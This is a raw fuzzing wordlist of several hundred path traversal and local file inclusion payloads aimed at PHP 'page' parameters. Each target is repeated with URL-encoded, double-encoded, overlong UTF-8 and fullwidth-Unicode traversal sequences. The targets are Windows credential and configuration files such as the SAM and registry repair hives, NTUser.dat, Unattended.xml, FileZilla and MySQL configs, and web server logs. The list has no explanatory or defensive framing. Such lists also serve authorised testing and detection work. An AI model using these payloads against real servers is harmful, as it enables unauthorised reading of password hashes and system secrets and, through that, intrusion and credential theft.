/index.php?page=../../../../../C:/Users/Administrator/NTUser.dat
/view.php?page=../../../../../C:/Users/Administrator/NTUser.dat
/index.php?page=%2e%2e%2fC:/Users/Administrator/NTUser.dat
/index.php?page=%252e%252e%252fC:/Users/Administrator/NTUser.dat
/index.php?page=%c0%ae%c0%ae%c0%afC:/Users/Administrator/NTUser.dat
/index.php?page=%uff0e%uff0e%u2215C:/Users/Administrator/NTUser.dat
/index.php?page=%uff0e%uff0e%u2216C:/Users/Administrator/NTUser.dat
/index.php?page=../../../../../C:/Documents and Settings/Administrator/NTUser.dat
/view.php?page=../../../../../C:/Documents and Settings/Administrator/NTUser.dat
/index.php?page=%2e%2e%2fC:/Documents and Settings/Administrator/NTUser.dat
/index.php?page=%252e%252e%252fC:/Documents and Settings/Administrator/NTUser.dat
/index.php?page=%c0%ae%c0%ae%c0%afC:/Documents and Settings/Administrator/NTUser.dat
/index.php?page=%uff0e%uff0e%u2215C:/Documents and Settings/Administrator/NTUser.dat
/index.php?page=%uff0e%uff0e%u2216C:/Documents and Settings/Administrator/NTUser.dat
/index.php?page=../../../../../C:/apache/logs/access.log
/view.php?page=../../../../../C:/apache/logs/access.log
/index.php?page=%2e%2e%2fC:/apache/logs/access.log
/index.php?page=%252e%252e%252fC:/apache/logs/access.log
/index.php?page=%c0%ae%c0%ae%c0%afC:/apache/logs/access.log
/index.php?page=%uff0e%uff0e%u2215C:/apache/logs/access.log
/index.php?page=%uff0e%uff0e%u2216C:/apache/logs/access.log
/index.php?page=../../../../../C:/apache/logs/error.log
/view.php?page=../../../../../C:/apache/logs/error.log
/index.php?page=%2e%2e%2fC:/apache/logs/error.log
/index.php?page=%252e%252e%252fC:/apache/logs/error.log
/index.php?page=%c0%ae%c0%ae%c0%afC:/apache/logs/error.log
/index.php?page=%uff0e%uff0e%u2215C:/apache/logs/error.log
/index.php?page=%uff0e%uff0e%u2216C:/apache/logs/error.log
/index.php?page=../../../../../C:/apache/php/php.ini
/view.php?page=../../../../../C:/apache/php/php.ini
/index.php?page=%2e%2e%2fC:/apache/php/php.ini
/index.php?page=%252e%252e%252fC:/apache/php/php.ini
/index.php?page=%c0%ae%c0%ae%c0%afC:/apache/php/php.ini
/index.php?page=%uff0e%uff0e%u2215C:/apache/php/php.ini
/index.php?page=%uff0e%uff0e%u2216C:/apache/php/php.ini
/index.php?page=../../../../../C:/boot.ini
/view.php?page=../../../../../C:/boot.ini
/index.php?page=%2e%2e%2fC:/boot.ini
/index.php?page=%252e%252e%252fC:/boot.ini
/index.php?page=%c0%ae%c0%ae%c0%afC:/boot.ini
/index.php?page=%uff0e%uff0e%u2215C:/boot.ini
/index.php?page=%uff0e%uff0e%u2216C:/boot.ini
/index.php?page=../../../../../C:/inetpub/wwwroot/global.asa
/view.php?page=../../../../../C:/inetpub/wwwroot/global.asa
/index.php?page=%2e%2e%2fC:/inetpub/wwwroot/global.asa
/index.php?page=%252e%252e%252fC:/inetpub/wwwroot/global.asa
/index.php?page=%c0%ae%c0%ae%c0%afC:/inetpub/wwwroot/global.asa
/index.php?page=%uff0e%uff0e%u2215C:/inetpub/wwwroot/global.asa
/index.php?page=%uff0e%uff0e%u2216C:/inetpub/wwwroot/global.asa
/index.php?page=../../../../../C:/MySQL/data/hostname.err
/view.php?page=../../../../../C:/MySQL/data/hostname.err
/index.php?page=%2e%2e%2fC:/MySQL/data/hostname.err
/index.php?page=%252e%252e%252fC:/MySQL/data/hostname.err
/index.php?page=%c0%ae%c0%ae%c0%afC:/MySQL/data/hostname.err
/index.php?page=%uff0e%uff0e%u2215C:/MySQL/data/hostname.err
/index.php?page=%uff0e%uff0e%u2216C:/MySQL/data/hostname.err
/index.php?page=../../../../../C:/MySQL/data/mysql.err
/view.php?page=../../../../../C:/MySQL/data/mysql.err
/index.php?page=%2e%2e%2fC:/MySQL/data/mysql.err
/index.php?page=%252e%252e%252fC:/MySQL/data/mysql.err
/index.php?page=%c0%ae%c0%ae%c0%afC:/MySQL/data/mysql.err
/index.php?page=%uff0e%uff0e%u2215C:/MySQL/data/mysql.err
/index.php?page=%uff0e%uff0e%u2216C:/MySQL/data/mysql.err
/index.php?page=../../../../../C:/MySQL/data/mysql.log
/view.php?page=../../../../../C:/MySQL/data/mysql.log
/index.php?page=%2e%2e%2fC:/MySQL/data/mysql.log
/index.php?page=%252e%252e%252fC:/MySQL/data/mysql.log
/index.php?page=%c0%ae%c0%ae%c0%afC:/MySQL/data/mysql.log
/index.php?page=%uff0e%uff0e%u2215C:/MySQL/data/mysql.log
/index.php?page=%uff0e%uff0e%u2216C:/MySQL/data/mysql.log
/index.php?page=../../../../../C:/MySQL/my.cnf
/view.php?page=../../../../../C:/MySQL/my.cnf
/index.php?page=%2e%2e%2fC:/MySQL/my.cnf
/index.php?page=%252e%252e%252fC:/MySQL/my.cnf
/index.php?page=%c0%ae%c0%ae%c0%afC:/MySQL/my.cnf
/index.php?page=%uff0e%uff0e%u2215C:/MySQL/my.cnf
/index.php?page=%uff0e%uff0e%u2216C:/MySQL/my.cnf
/index.php?page=../../../../../C:/MySQL/my.ini
/view.php?page=../../../../../C:/MySQL/my.ini
/index.php?page=%2e%2e%2fC:/MySQL/my.ini
/index.php?page=%252e%252e%252fC:/MySQL/my.ini
/index.php?page=%c0%ae%c0%ae%c0%afC:/MySQL/my.ini
/index.php?page=%uff0e%uff0e%u2215C:/MySQL/my.ini
/index.php?page=%uff0e%uff0e%u2216C:/MySQL/my.ini
/index.php?page=../../../../../C:/php4/php.ini
/view.php?page=../../../../../C:/php4/php.ini
/index.php?page=%2e%2e%2fC:/php4/php.ini
/index.php?page=%252e%252e%252fC:/php4/php.ini
/index.php?page=%c0%ae%c0%ae%c0%afC:/php4/php.ini
/index.php?page=%uff0e%uff0e%u2215C:/php4/php.ini
/index.php?page=%uff0e%uff0e%u2216C:/php4/php.ini
/index.php?page=../../../../../C:/php5/php.ini
/view.php?page=../../../../../C:/php5/php.ini
/index.php?page=%2e%2e%2fC:/php5/php.ini
/index.php?page=%252e%252e%252fC:/php5/php.ini
/index.php?page=%c0%ae%c0%ae%c0%afC:/php5/php.ini
/index.php?page=%uff0e%uff0e%u2215C:/php5/php.ini
/index.php?page=%uff0e%uff0e%u2216C:/php5/php.ini
/index.php?page=../../../../../C:/php/php.ini
/view.php?page=../../../../../C:/php/php.ini
/index.php?page=%2e%2e%2fC:/php/php.ini
/index.php?page=%252e%252e%252fC:/php/php.ini
/index.php?page=%c0%ae%c0%ae%c0%afC:/php/php.ini
/index.php?page=%uff0e%uff0e%u2215C:/php/php.ini
/index.php?page=%uff0e%uff0e%u2216C:/php/php.ini
/index.php?page=../../../../../C:/Program Files/Apache Group/Apache2/conf/httpd.conf
/view.php?page=../../../../../C:/Program Files/Apache Group/Apache2/conf/httpd.conf
/index.php?page=%2e%2e%2fC:/Program Files/Apache Group/Apache2/conf/httpd.conf
/index.php?page=%252e%252e%252fC:/Program Files/Apache Group/Apache2/conf/httpd.conf
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/Apache Group/Apache2/conf/httpd.conf
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/Apache Group/Apache2/conf/httpd.conf
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/Apache Group/Apache2/conf/httpd.conf
/index.php?page=../../../../../C:/Program Files/Apache Group/Apache/conf/httpd.conf
/view.php?page=../../../../../C:/Program Files/Apache Group/Apache/conf/httpd.conf
/index.php?page=%2e%2e%2fC:/Program Files/Apache Group/Apache/conf/httpd.conf
/index.php?page=%252e%252e%252fC:/Program Files/Apache Group/Apache/conf/httpd.conf
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/Apache Group/Apache/conf/httpd.conf
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/Apache Group/Apache/conf/httpd.conf
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/Apache Group/Apache/conf/httpd.conf
/index.php?page=../../../../../C:/Program Files/Apache Group/Apache/logs/access.log
/view.php?page=../../../../../C:/Program Files/Apache Group/Apache/logs/access.log
/index.php?page=%2e%2e%2fC:/Program Files/Apache Group/Apache/logs/access.log
/index.php?page=%252e%252e%252fC:/Program Files/Apache Group/Apache/logs/access.log
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/Apache Group/Apache/logs/access.log
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/Apache Group/Apache/logs/access.log
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/Apache Group/Apache/logs/access.log
/index.php?page=../../../../../C:/Program Files/Apache Group/Apache/logs/error.log
/view.php?page=../../../../../C:/Program Files/Apache Group/Apache/logs/error.log
/index.php?page=%2e%2e%2fC:/Program Files/Apache Group/Apache/logs/error.log
/index.php?page=%252e%252e%252fC:/Program Files/Apache Group/Apache/logs/error.log
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/Apache Group/Apache/logs/error.log
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/Apache Group/Apache/logs/error.log
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/Apache Group/Apache/logs/error.log
/index.php?page=../../../../../C:/Program Files/FileZilla Server/FileZilla Server.xml
/view.php?page=../../../../../C:/Program Files/FileZilla Server/FileZilla Server.xml
/index.php?page=%2e%2e%2fC:/Program Files/FileZilla Server/FileZilla Server.xml
/index.php?page=%252e%252e%252fC:/Program Files/FileZilla Server/FileZilla Server.xml
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/FileZilla Server/FileZilla Server.xml
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/FileZilla Server/FileZilla Server.xml
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/FileZilla Server/FileZilla Server.xml
/index.php?page=../../../../../C:/Program Files/MySQL/data/hostname.err
/view.php?page=../../../../../C:/Program Files/MySQL/data/hostname.err
/index.php?page=%2e%2e%2fC:/Program Files/MySQL/data/hostname.err
/index.php?page=%252e%252e%252fC:/Program Files/MySQL/data/hostname.err
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/MySQL/data/hostname.err
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/MySQL/data/hostname.err
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/MySQL/data/hostname.err
/index.php?page=../../../../../C:/Program Files/MySQL/data/mysql-bin.log
/view.php?page=../../../../../C:/Program Files/MySQL/data/mysql-bin.log
/index.php?page=%2e%2e%2fC:/Program Files/MySQL/data/mysql-bin.log
/index.php?page=%252e%252e%252fC:/Program Files/MySQL/data/mysql-bin.log
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/MySQL/data/mysql-bin.log
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/MySQL/data/mysql-bin.log
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/MySQL/data/mysql-bin.log
/index.php?page=../../../../../C:/Program Files/MySQL/data/mysql.err
/view.php?page=../../../../../C:/Program Files/MySQL/data/mysql.err
/index.php?page=%2e%2e%2fC:/Program Files/MySQL/data/mysql.err
/index.php?page=%252e%252e%252fC:/Program Files/MySQL/data/mysql.err
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/MySQL/data/mysql.err
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/MySQL/data/mysql.err
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/MySQL/data/mysql.err
/index.php?page=../../../../../C:/Program Files/MySQL/data/mysql.log
/view.php?page=../../../../../C:/Program Files/MySQL/data/mysql.log
/index.php?page=%2e%2e%2fC:/Program Files/MySQL/data/mysql.log
/index.php?page=%252e%252e%252fC:/Program Files/MySQL/data/mysql.log
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/MySQL/data/mysql.log
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/MySQL/data/mysql.log
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/MySQL/data/mysql.log
/index.php?page=../../../../../C:/Program Files/MySQL/my.ini
/view.php?page=../../../../../C:/Program Files/MySQL/my.ini
/index.php?page=%2e%2e%2fC:/Program Files/MySQL/my.ini
/index.php?page=%252e%252e%252fC:/Program Files/MySQL/my.ini
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/MySQL/my.ini
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/MySQL/my.ini
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/MySQL/my.ini
/index.php?page=../../../../../C:/Program Files/MySQL/my.cnf
/view.php?page=../../../../../C:/Program Files/MySQL/my.cnf
/index.php?page=%2e%2e%2fC:/Program Files/MySQL/my.cnf
/index.php?page=%252e%252e%252fC:/Program Files/MySQL/my.cnf
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/MySQL/my.cnf
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/MySQL/my.cnf
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/MySQL/my.cnf
/index.php?page=../../../../../C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
/view.php?page=../../../../../C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
/index.php?page=%2e%2e%2fC:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
/index.php?page=%252e%252e%252fC:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
/index.php?page=../../../../../C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log 
/view.php?page=../../../../../C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log 
/index.php?page=%2e%2e%2fC:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log 
/index.php?page=%252e%252e%252fC:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log 
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log 
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log 
/index.php?page=../../../../../C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err 
/view.php?page=../../../../../C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err 
/index.php?page=%2e%2e%2fC:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err 
/index.php?page=%252e%252e%252fC:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err 
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err 
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err 
/index.php?page=../../../../../C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log 
/view.php?page=../../../../../C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log 
/index.php?page=%2e%2e%2fC:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log 
/index.php?page=%252e%252e%252fC:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log 
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log 
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log 
/index.php?page=../../../../../C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
/view.php?page=../../../../../C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
/index.php?page=%2e%2e%2fC:/Program Files/MySQL/MySQL Server 5.0/my.cnf
/index.php?page=%252e%252e%252fC:/Program Files/MySQL/MySQL Server 5.0/my.cnf
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/MySQL/MySQL Server 5.0/my.cnf
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
/index.php?page=../../../../../C:/Program Files/MySQL/MySQL Server 5.0/my.ini
/view.php?page=../../../../../C:/Program Files/MySQL/MySQL Server 5.0/my.ini
/index.php?page=%2e%2e%2fC:/Program Files/MySQL/MySQL Server 5.0/my.ini
/index.php?page=%252e%252e%252fC:/Program Files/MySQL/MySQL Server 5.0/my.ini
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/MySQL/MySQL Server 5.0/my.ini
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/MySQL/MySQL Server 5.0/my.ini
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/MySQL/MySQL Server 5.0/my.ini
/index.php?page=../../../../../C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf 
/view.php?page=../../../../../C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf 
/index.php?page=%2e%2e%2fC:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf 
/index.php?page=%252e%252e%252fC:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf 
/index.php?page=%uff0e%uff0e%u2215C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf 
/index.php?page=%uff0e%uff0e%u2216C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf 
/index.php?page=../../../../../C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf 
/view.php?page=../../../../../C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf 
/index.php?page=%2e%2e%2fC:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf 
/index.php?page=%252e%252e%252fC:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf 
/index.php?page=%uff0e%uff0e%u2215C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf 
/index.php?page=%uff0e%uff0e%u2216C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf 
/index.php?page=../../../../../C:/Program Files (x86)/Apache Group/Apache/conf/access.log 
/view.php?page=../../../../../C:/Program Files (x86)/Apache Group/Apache/conf/access.log 
/index.php?page=%2e%2e%2fC:/Program Files (x86)/Apache Group/Apache/conf/access.log 
/index.php?page=%252e%252e%252fC:/Program Files (x86)/Apache Group/Apache/conf/access.log 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files (x86)/Apache Group/Apache/conf/access.log 
/index.php?page=%uff0e%uff0e%u2215C:/Program Files (x86)/Apache Group/Apache/conf/access.log 
/index.php?page=%uff0e%uff0e%u2216C:/Program Files (x86)/Apache Group/Apache/conf/access.log 
/index.php?page=../../../../../C:/Program Files (x86)/Apache Group/Apache/conf/error.log 
/view.php?page=../../../../../C:/Program Files (x86)/Apache Group/Apache/conf/error.log 
/index.php?page=%2e%2e%2fC:/Program Files (x86)/Apache Group/Apache/conf/error.log 
/index.php?page=%252e%252e%252fC:/Program Files (x86)/Apache Group/Apache/conf/error.log 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files (x86)/Apache Group/Apache/conf/error.log 
/index.php?page=%uff0e%uff0e%u2215C:/Program Files (x86)/Apache Group/Apache/conf/error.log 
/index.php?page=%uff0e%uff0e%u2216C:/Program Files (x86)/Apache Group/Apache/conf/error.log 
/index.php?page=../../../../../C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml 
/view.php?page=../../../../../C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml 
/index.php?page=%2e%2e%2fC:/Program Files (x86)/FileZilla Server/FileZilla Server.xml 
/index.php?page=%252e%252e%252fC:/Program Files (x86)/FileZilla Server/FileZilla Server.xml 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files (x86)/FileZilla Server/FileZilla Server.xml 
/index.php?page=%uff0e%uff0e%u2215C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml 
/index.php?page=%uff0e%uff0e%u2216C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml 
/index.php?page=../../../../../C:/Program Files (x86)/xampp/apache/conf/httpd.conf 
/view.php?page=../../../../../C:/Program Files (x86)/xampp/apache/conf/httpd.conf 
/index.php?page=%2e%2e%2fC:/Program Files (x86)/xampp/apache/conf/httpd.conf 
/index.php?page=%252e%252e%252fC:/Program Files (x86)/xampp/apache/conf/httpd.conf 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files (x86)/xampp/apache/conf/httpd.conf 
/index.php?page=%uff0e%uff0e%u2215C:/Program Files (x86)/xampp/apache/conf/httpd.conf 
/index.php?page=%uff0e%uff0e%u2216C:/Program Files (x86)/xampp/apache/conf/httpd.conf 
/index.php?page=../../../../../C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM 
/view.php?page=../../../../../C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM 
/index.php?page=%2e%2e%2fC:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM 
/index.php?page=%252e%252e%252fC:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM 
/index.php?page=%c0%ae%c0%ae%c0%afC:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM 
/index.php?page=%uff0e%uff0e%u2215C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM 
/index.php?page=%uff0e%uff0e%u2216C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM 
/index.php?page=../../../../../C:/Windows/repair/system C:/Windows/repair/software 
/view.php?page=../../../../../C:/Windows/repair/system C:/Windows/repair/software 
/index.php?page=%2e%2e%2fC:/Windows/repair/system C:/Windows/repair/software 
/index.php?page=%252e%252e%252fC:/Windows/repair/system C:/Windows/repair/software 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/repair/system C:/Windows/repair/software 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/repair/system C:/Windows/repair/software 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/repair/system C:/Windows/repair/software 
/index.php?page=../../../../../C:/Windows/repair/security 
/view.php?page=../../../../../C:/Windows/repair/security 
/index.php?page=%2e%2e%2fC:/Windows/repair/security 
/index.php?page=%252e%252e%252fC:/Windows/repair/security 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/repair/security 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/repair/security 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/repair/security 
/index.php?page=../../../../../C:/WINDOWS/System32/drivers/etc/hosts
/view.php?page=../../../../../C:/WINDOWS/System32/drivers/etc/hosts
/index.php?page=%2e%2e%2fC:/WINDOWS/System32/drivers/etc/hosts
/index.php?page=%252e%252e%252fC:/WINDOWS/System32/drivers/etc/hosts
/index.php?page=%c0%ae%c0%ae%c0%afC:/WINDOWS/System32/drivers/etc/hosts
/index.php?page=%uff0e%uff0e%u2215C:/WINDOWS/System32/drivers/etc/hosts
/index.php?page=%uff0e%uff0e%u2216C:/WINDOWS/System32/drivers/etc/hosts
/index.php?page=../../../../../C:/Windows/win.ini 
/view.php?page=../../../../../C:/Windows/win.ini 
/index.php?page=%2e%2e%2fC:/Windows/win.ini 
/index.php?page=%252e%252e%252fC:/Windows/win.ini 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/win.ini 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/win.ini 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/win.ini 
/index.php?page=../../../../../C:/WINNT/php.ini
/view.php?page=../../../../../C:/WINNT/php.ini
/index.php?page=%2e%2e%2fC:/WINNT/php.ini
/index.php?page=%252e%252e%252fC:/WINNT/php.ini
/index.php?page=%c0%ae%c0%ae%c0%afC:/WINNT/php.ini
/index.php?page=%uff0e%uff0e%u2215C:/WINNT/php.ini
/index.php?page=%uff0e%uff0e%u2216C:/WINNT/php.ini
/index.php?page=../../../../../C:/WINNT/win.ini
/view.php?page=../../../../../C:/WINNT/win.ini
/index.php?page=%2e%2e%2fC:/WINNT/win.ini
/index.php?page=%252e%252e%252fC:/WINNT/win.ini
/index.php?page=%c0%ae%c0%ae%c0%afC:/WINNT/win.ini
/index.php?page=%uff0e%uff0e%u2215C:/WINNT/win.ini
/index.php?page=%uff0e%uff0e%u2216C:/WINNT/win.ini
/index.php?page=../../../../../C:/xampp/apache/bin/php.ini
/view.php?page=../../../../../C:/xampp/apache/bin/php.ini
/index.php?page=%2e%2e%2fC:/xampp/apache/bin/php.ini
/index.php?page=%252e%252e%252fC:/xampp/apache/bin/php.ini
/index.php?page=%c0%ae%c0%ae%c0%afC:/xampp/apache/bin/php.ini
/index.php?page=%uff0e%uff0e%u2215C:/xampp/apache/bin/php.ini
/index.php?page=%uff0e%uff0e%u2216C:/xampp/apache/bin/php.ini
/index.php?page=../../../../../C:/xampp/apache/logs/access.log 
/view.php?page=../../../../../C:/xampp/apache/logs/access.log 
/index.php?page=%2e%2e%2fC:/xampp/apache/logs/access.log 
/index.php?page=%252e%252e%252fC:/xampp/apache/logs/access.log 
/index.php?page=%c0%ae%c0%ae%c0%afC:/xampp/apache/logs/access.log 
/index.php?page=%uff0e%uff0e%u2215C:/xampp/apache/logs/access.log 
/index.php?page=%uff0e%uff0e%u2216C:/xampp/apache/logs/access.log 
/index.php?page=../../../../../C:/xampp/apache/logs/error.log 
/view.php?page=../../../../../C:/xampp/apache/logs/error.log 
/index.php?page=%2e%2e%2fC:/xampp/apache/logs/error.log 
/index.php?page=%252e%252e%252fC:/xampp/apache/logs/error.log 
/index.php?page=%c0%ae%c0%ae%c0%afC:/xampp/apache/logs/error.log 
/index.php?page=%uff0e%uff0e%u2215C:/xampp/apache/logs/error.log 
/index.php?page=%uff0e%uff0e%u2216C:/xampp/apache/logs/error.log 
/index.php?page=../../../../../C:/Windows/Panther/Unattend/Unattended.xml 
/view.php?page=../../../../../C:/Windows/Panther/Unattend/Unattended.xml 
/index.php?page=%2e%2e%2fC:/Windows/Panther/Unattend/Unattended.xml 
/index.php?page=%252e%252e%252fC:/Windows/Panther/Unattend/Unattended.xml 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/Panther/Unattend/Unattended.xml 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/Panther/Unattend/Unattended.xml 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/Panther/Unattend/Unattended.xml 
/index.php?page=../../../../../C:/Windows/Panther/Unattended.xml 
/view.php?page=../../../../../C:/Windows/Panther/Unattended.xml 
/index.php?page=%2e%2e%2fC:/Windows/Panther/Unattended.xml 
/index.php?page=%252e%252e%252fC:/Windows/Panther/Unattended.xml 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/Panther/Unattended.xml 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/Panther/Unattended.xml 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/Panther/Unattended.xml 
/index.php?page=../../../../../C:/Windows/debug/NetSetup.log 
/view.php?page=../../../../../C:/Windows/debug/NetSetup.log 
/index.php?page=%2e%2e%2fC:/Windows/debug/NetSetup.log 
/index.php?page=%252e%252e%252fC:/Windows/debug/NetSetup.log 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/debug/NetSetup.log 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/debug/NetSetup.log 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/debug/NetSetup.log 
/index.php?page=../../../../../C:/Windows/system32/config/AppEvent.Evt 
/view.php?page=../../../../../C:/Windows/system32/config/AppEvent.Evt 
/index.php?page=%2e%2e%2fC:/Windows/system32/config/AppEvent.Evt 
/index.php?page=%252e%252e%252fC:/Windows/system32/config/AppEvent.Evt 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/system32/config/AppEvent.Evt 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/system32/config/AppEvent.Evt 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/system32/config/AppEvent.Evt 
/index.php?page=../../../../../C:/Windows/system32/config/SecEvent.Evt 
/view.php?page=../../../../../C:/Windows/system32/config/SecEvent.Evt 
/index.php?page=%2e%2e%2fC:/Windows/system32/config/SecEvent.Evt 
/index.php?page=%252e%252e%252fC:/Windows/system32/config/SecEvent.Evt 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/system32/config/SecEvent.Evt 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/system32/config/SecEvent.Evt 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/system32/config/SecEvent.Evt 
/index.php?page=../../../../../C:/Windows/system32/config/default.sav 
/view.php?page=../../../../../C:/Windows/system32/config/default.sav 
/index.php?page=%2e%2e%2fC:/Windows/system32/config/default.sav 
/index.php?page=%252e%252e%252fC:/Windows/system32/config/default.sav 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/system32/config/default.sav 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/system32/config/default.sav 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/system32/config/default.sav 
/index.php?page=../../../../../C:/Windows/system32/config/security.sav 
/view.php?page=../../../../../C:/Windows/system32/config/security.sav 
/index.php?page=%2e%2e%2fC:/Windows/system32/config/security.sav 
/index.php?page=%252e%252e%252fC:/Windows/system32/config/security.sav 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/system32/config/security.sav 
